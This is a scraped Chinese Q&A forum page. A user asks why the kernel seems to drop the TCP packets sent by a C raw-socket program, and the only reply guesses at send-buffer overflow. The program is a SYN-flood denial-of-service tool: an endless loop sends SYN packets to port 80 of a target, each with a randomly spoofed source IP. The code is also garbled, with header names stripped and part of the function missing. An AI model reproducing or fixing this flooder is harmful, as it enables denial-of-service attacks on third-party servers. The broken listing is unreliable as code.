当前位置:  技术问答>linux和unix

为什么对外发送大量的TCP数据包都几乎被kernel丢弃了呢

    来源: 互联网  发布时间:2015-12-23

    本文导语:  下面的程序不断的对外发送大量的TCP数据包,但是通过tcpdump观测发现几乎都被kernel丢弃了,这是为什么呢? #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #define DESTPORT 80  ...

下面的程序不断的对外发送大量的TCP数据包,但是通过tcpdump观测发现几乎都被kernel丢弃了,这是为什么呢?
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define DESTPORT 80 
#define LOCALPORT 8888

void send_tcp(int sockfd, struct sockaddr_in *addr);
unsigned short check_sum(unsigned short *addr, int len);


int main(int argc, char **argv)
{
  int sockfd;
  struct sockaddr_in addr;
  struct hostent *host;
  int on = 1;
  if(argc != 2)
    {
      fprintf(stderr, "Usage:%s hostnamen", argv[0]);
      exit(1);
    }
  bzero(&addr, sizeof(struct sockaddr_in));
  addr.sin_family = AF_INET;
  addr.sin_port = htons(DESTPORT);
  if(inet_aton(argv[1], &addr.sin_addr) == 0)
    {
      if((host = gethostbyname(argv[1])) == NULL)
        {
          fprintf(stderr, "HostName Error:%sna", hstrerror(h_errno));
          exit(1);
        }
      addr.sin_addr = *(struct in_addr *)host->h_addr;
    }
  /**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/
  if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) ip_v = IPVERSION; /** 版本一般的是 4 **/
  ip->ip_hl = sizeof(struct ip) >> 2; /** IP数据包的头部长度 **/
  ip->ip_tos = 0; /** 服务类型 **/
  ip->ip_len = htons(head_len); /** IP数据包的长度 **/
  ip->ip_id = 0; /** 让系统去填写吧 **/
  ip->ip_off = 0; /** 和上面一样,省点时间 **/
  ip->ip_ttl = MAXTTL; /** 最长的时间 255 **/
  ip->ip_p = IPPROTO_TCP; /** 我们要发的是 TCP包 **/
  ip->ip_sum = 0; /** 校验和让系统去做 **/
  ip->ip_dst = addr->sin_addr;
  /******* 开始填写TCP数据包 *****/
  tcp = (struct tcphdr *)(buffer + sizeof(struct ip));
  tcp->source = htons(LOCALPORT);
  tcp->dest = addr->sin_port; /** 目的端口 **/
  tcp->seq = random();
  tcp->ack_seq = 0;
  tcp->doff = 5;
  tcp->syn = 1; /** 我要建立连接 **/
  tcp->check = 0;

  while(1)
    {
      ip->ip_src.s_addr = random();
      if((n = sendto(sockfd, buffer, head_len, 0, (struct sockaddr *)addr, sizeof(struct sockaddr_in))) == -1)
        {
          fprintf(stderr, "sendto errorn");
        }
      else
        {
          printf("sent %d bytesn", n);
        }
    }
}

|
sendbuf overflow?

    
 
 

您可能感兴趣的文章:

 
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • 如何在方法内部对外部数据进行操作,不用返回值:而外部数据已经被修改。
  • 用httpd的listen监听了3个端口9001、9002和9003,9001和9002已经对外开放了,从哪能知道是怎么对外开发的?
  • httpd监听的端口,除了iptables,是不是xinetd也可以控制对外开放。
  • 如何打开对外的25端口
  • 在内网linux服务器上架设网站,想要对外网发布出去怎么做才好?
  • 建立对外SVN服务问题
  • 端口无法对外开放怎么办?
  • 怎样配置IPTables能让LAN对外的请求全部通过?


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3